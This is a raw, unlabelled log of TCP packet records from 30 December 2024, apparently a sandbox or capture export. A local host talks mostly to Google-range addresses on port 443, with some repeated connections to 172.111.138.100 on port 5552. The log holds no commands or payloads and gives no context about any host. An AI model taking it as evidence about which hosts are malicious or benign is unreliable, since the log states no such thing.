Dec 30, 2024 11:41:39.836811066 CET	49898	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:39.837410927 CET	49898	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:39.837431908 CET	443	49898	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:39.874418974 CET	443	49888	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:39.874511957 CET	49888	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:39.875224113 CET	49888	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:39.875227928 CET	443	49888	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:39.875560999 CET	49888	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:39.875571012 CET	443	49888	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:39.905445099 CET	443	49889	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:39.905524015 CET	49889	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:39.909393072 CET	49889	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:39.909406900 CET	443	49889	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:39.914429903 CET	49889	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:39.914438009 CET	443	49889	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:39.929837942 CET	443	49887	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:39.929902077 CET	443	49887	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:39.929923058 CET	49887	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:39.929938078 CET	443	49887	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:39.930092096 CET	49887	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:39.930092096 CET	49887	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:39.930603027 CET	443	49887	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:39.930665970 CET	443	49887	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:39.930784941 CET	49887	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:39.933811903 CET	49887	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:39.933830023 CET	443	49887	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:39.934417963 CET	49899	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:39.934461117 CET	443	49899	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:39.935184002 CET	49899	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:39.939017057 CET	49899	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:39.939033031 CET	443	49899	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:40.268593073 CET	443	49888	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:40.269191980 CET	49888	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.269769907 CET	443	49888	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:40.269803047 CET	443	49888	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:40.271445990 CET	49888	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.315841913 CET	443	49889	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:40.315886974 CET	443	49889	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:40.315994978 CET	49889	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:40.316015959 CET	443	49889	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:40.318749905 CET	49889	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:40.320386887 CET	443	49889	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:40.320436001 CET	49889	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:40.320451021 CET	443	49889	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:40.321737051 CET	49889	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:40.463778019 CET	49888	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.463778019 CET	49888	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.463794947 CET	443	49888	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:40.463884115 CET	49888	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.464267015 CET	443	49898	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:40.464325905 CET	49898	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.464734077 CET	49900	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.464787006 CET	443	49900	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:40.464858055 CET	49900	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.465029955 CET	49900	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.465049028 CET	443	49900	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:40.469924927 CET	49889	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:40.469944954 CET	443	49889	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:40.471330881 CET	49901	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:40.471362114 CET	443	49901	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:40.471602917 CET	49901	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:40.471715927 CET	49901	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:40.471723080 CET	443	49901	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:40.548980951 CET	443	49899	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:40.549540043 CET	49899	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:40.553416014 CET	49898	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.553423882 CET	443	49898	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:40.553633928 CET	49898	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.553638935 CET	443	49898	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:40.556529045 CET	49899	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:40.556546926 CET	443	49899	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:40.558577061 CET	49899	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:40.558585882 CET	443	49899	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:40.842205048 CET	443	49898	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:40.842256069 CET	49898	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.842267036 CET	443	49898	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:40.842590094 CET	49898	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.842653036 CET	443	49898	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:40.842694998 CET	443	49898	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:40.842721939 CET	49898	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.842737913 CET	49898	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.849067926 CET	49898	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.849078894 CET	443	49898	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:40.849771023 CET	49907	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.849790096 CET	443	49907	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:40.849904060 CET	49907	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.850087881 CET	49907	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.850095987 CET	443	49907	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:40.862967968 CET	49900	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.863182068 CET	49901	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:40.863197088 CET	49899	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:40.864165068 CET	49908	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.864201069 CET	443	49908	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:40.864252090 CET	49908	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.866735935 CET	49908	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:40.866750956 CET	443	49908	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:40.867934942 CET	49909	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:40.867973089 CET	443	49909	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:40.868726015 CET	49909	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:40.869678020 CET	49909	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:40.869692087 CET	443	49909	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:41.463691950 CET	443	49908	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:41.463783979 CET	49908	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:41.464466095 CET	443	49908	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:41.464521885 CET	49908	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:41.472019911 CET	49908	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:41.472042084 CET	443	49908	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:41.472333908 CET	443	49908	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:41.472398043 CET	49908	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:41.472845078 CET	49908	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:41.476984978 CET	443	49907	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:41.477394104 CET	49907	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:41.477762938 CET	49907	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:41.477768898 CET	443	49907	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:41.478018045 CET	49907	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:41.478023052 CET	443	49907	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:41.496040106 CET	443	49909	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:41.496112108 CET	49909	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:41.497858047 CET	49909	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:41.497869015 CET	443	49909	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:41.498106956 CET	443	49909	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:41.498164892 CET	49909	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:41.498502970 CET	49909	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:41.519334078 CET	443	49908	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:41.539344072 CET	443	49909	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:41.834270954 CET	443	49908	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:41.834345102 CET	49908	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:41.834376097 CET	443	49908	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:41.834419966 CET	49908	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:41.834568977 CET	49908	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:41.834630013 CET	443	49908	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:41.834738016 CET	49908	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:41.835563898 CET	49917	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:41.835622072 CET	443	49917	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:41.835817099 CET	49918	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:41.835819960 CET	49917	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:41.835855961 CET	443	49918	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:41.835901976 CET	49918	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:41.836756945 CET	49918	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:41.836772919 CET	443	49918	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:41.836858034 CET	49917	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:41.836874008 CET	443	49917	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:41.853172064 CET	443	49907	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:41.853247881 CET	49907	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:41.853327990 CET	49907	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:41.853418112 CET	443	49907	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:41.853522062 CET	49907	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:41.854290009 CET	49919	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:41.854331017 CET	443	49919	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:41.854407072 CET	49919	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:41.854790926 CET	49919	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:41.854804993 CET	443	49919	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:41.916291952 CET	443	49909	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:41.916359901 CET	49909	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:41.916373014 CET	443	49909	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:41.916383982 CET	443	49909	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:41.916434050 CET	49909	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:41.916440010 CET	443	49909	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:41.916474104 CET	49909	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:41.916744947 CET	443	49909	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:41.916784048 CET	49909	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:41.916806936 CET	443	49909	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:41.916845083 CET	49909	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:41.917403936 CET	49909	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:41.917419910 CET	443	49909	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:41.917435884 CET	49909	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:41.917465925 CET	49909	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:41.917886972 CET	49920	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:41.917920113 CET	443	49920	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:41.917995930 CET	49920	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:41.918306112 CET	49920	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:41.918317080 CET	443	49920	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:42.435972929 CET	443	49918	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:42.436229944 CET	49918	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:42.436757088 CET	443	49918	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:42.436830997 CET	443	49917	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:42.436901093 CET	49917	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:42.436928988 CET	49918	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:42.437668085 CET	49917	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:42.437681913 CET	443	49917	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:42.439237118 CET	49918	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:42.439244986 CET	443	49918	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:42.439634085 CET	443	49918	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:42.439814091 CET	49918	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:42.439989090 CET	49917	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:42.439997911 CET	443	49917	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:42.440501928 CET	49918	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:42.473366022 CET	443	49919	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:42.473472118 CET	49919	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:42.474143028 CET	443	49919	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:42.474251986 CET	49919	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:42.475941896 CET	49919	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:42.475956917 CET	443	49919	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:42.476201057 CET	443	49919	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:42.476289988 CET	49919	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:42.476604939 CET	49919	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:42.483324051 CET	443	49918	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:42.519326925 CET	443	49919	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:42.527430058 CET	443	49920	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:42.527823925 CET	49920	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:42.528516054 CET	49920	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:42.528516054 CET	49920	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:42.528522968 CET	443	49920	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:42.528537035 CET	443	49920	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:42.796367884 CET	5552	49845	172.111.138.100	192.168.2.7
Dec 30, 2024 11:41:42.796488047 CET	49845	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:41:42.807801008 CET	443	49918	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:42.808722019 CET	49918	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:42.808793068 CET	443	49918	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:42.808842897 CET	443	49918	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:42.809261084 CET	49918	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:42.851371050 CET	443	49919	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:42.852303028 CET	443	49919	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:42.856714964 CET	49919	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:42.944710970 CET	49845	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:41:42.949518919 CET	5552	49845	172.111.138.100	192.168.2.7
Dec 30, 2024 11:41:42.993024111 CET	443	49917	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:42.993084908 CET	443	49917	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:42.993207932 CET	443	49917	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:42.993318081 CET	443	49920	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:42.993403912 CET	49917	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:42.993458033 CET	443	49920	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:42.993837118 CET	443	49920	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:42.993895054 CET	49920	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:43.000756979 CET	49920	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:43.126399040 CET	49918	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:43.126399040 CET	49918	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:43.126426935 CET	443	49918	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:43.131246090 CET	49918	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:43.131361008 CET	49930	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:43.131383896 CET	443	49930	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:43.131474018 CET	49930	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:43.132399082 CET	49930	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:43.132411003 CET	443	49930	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:43.141998053 CET	49919	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:43.142021894 CET	443	49919	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:43.142052889 CET	49919	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:43.142179966 CET	49919	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:43.142606020 CET	49931	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:43.142635107 CET	443	49931	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:43.142719030 CET	49931	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:43.142946005 CET	49931	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:43.142956972 CET	443	49931	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:43.153692961 CET	49917	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:43.153707981 CET	443	49917	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:43.154227018 CET	49932	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:43.154258966 CET	443	49932	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:43.154331923 CET	49932	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:43.154736996 CET	49920	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:43.154746056 CET	443	49920	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:43.154846907 CET	49932	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:43.154866934 CET	443	49932	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:43.162653923 CET	49934	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:43.162687063 CET	443	49934	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:43.162796974 CET	49934	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:43.172113895 CET	49934	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:43.172127008 CET	443	49934	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:43.735025883 CET	443	49930	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:43.735112906 CET	49930	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:43.739969969 CET	49930	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:43.739979029 CET	443	49930	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:43.742691040 CET	49930	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:43.742697001 CET	443	49930	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:43.744527102 CET	443	49931	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:43.744616032 CET	49931	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:43.745513916 CET	49931	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:43.745520115 CET	443	49931	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:43.745708942 CET	49931	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:43.745714903 CET	443	49931	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:43.773968935 CET	443	49932	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:43.774048090 CET	49932	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:43.780956984 CET	443	49934	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:43.781023979 CET	49934	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:43.789860964 CET	49934	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:43.789865971 CET	443	49934	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:43.790064096 CET	49934	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:43.790070057 CET	443	49934	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:43.791834116 CET	49932	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:43.791850090 CET	443	49932	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:43.791996956 CET	49932	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:43.792002916 CET	443	49932	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:44.107552052 CET	443	49930	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:44.107613087 CET	49930	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:44.107625961 CET	443	49930	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:44.107757092 CET	49930	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:44.108371973 CET	443	49930	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:44.108414888 CET	443	49930	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:44.108438969 CET	49930	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:44.108457088 CET	49930	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:44.119385004 CET	443	49931	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:44.119461060 CET	49931	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:44.120379925 CET	443	49931	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:44.120446920 CET	443	49931	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:44.120487928 CET	49931	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:44.120487928 CET	49931	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:44.182555914 CET	443	49932	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:44.182604074 CET	443	49932	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:44.182673931 CET	49932	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:44.182702065 CET	443	49932	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:44.182718039 CET	443	49932	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:44.182754040 CET	49932	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:44.182779074 CET	49932	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:44.340044022 CET	443	49934	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:44.340096951 CET	443	49934	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:44.340136051 CET	49934	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:44.340147972 CET	443	49934	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:44.340159893 CET	49934	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:44.340208054 CET	49934	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:44.340511084 CET	443	49934	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:44.340565920 CET	49934	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:44.340585947 CET	443	49934	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:44.340670109 CET	49934	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:44.462605000 CET	49945	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:41:44.467385054 CET	5552	49945	172.111.138.100	192.168.2.7
Dec 30, 2024 11:41:44.468770981 CET	49945	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:41:44.469305992 CET	49945	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:41:44.474071026 CET	5552	49945	172.111.138.100	192.168.2.7
Dec 30, 2024 11:41:46.592555046 CET	5552	49945	172.111.138.100	192.168.2.7
Dec 30, 2024 11:41:46.592710018 CET	49945	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:41:46.651756048 CET	49945	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:41:46.656601906 CET	5552	49945	172.111.138.100	192.168.2.7
Dec 30, 2024 11:41:49.428018093 CET	49931	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:49.428033113 CET	443	49931	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:49.428093910 CET	49930	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:49.428121090 CET	443	49930	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:49.429260015 CET	49979	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:49.429266930 CET	49980	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:49.429290056 CET	443	49979	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:49.429297924 CET	443	49980	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:49.429403067 CET	49979	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:49.429466963 CET	49980	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:49.430181026 CET	49980	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:49.430195093 CET	443	49980	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:49.430633068 CET	49979	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:49.430648088 CET	443	49979	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:49.431602001 CET	49932	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:49.431621075 CET	443	49932	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:49.431711912 CET	49934	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:49.431716919 CET	443	49934	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:49.433862925 CET	49982	443	192.168.2.7	142.250.185.193
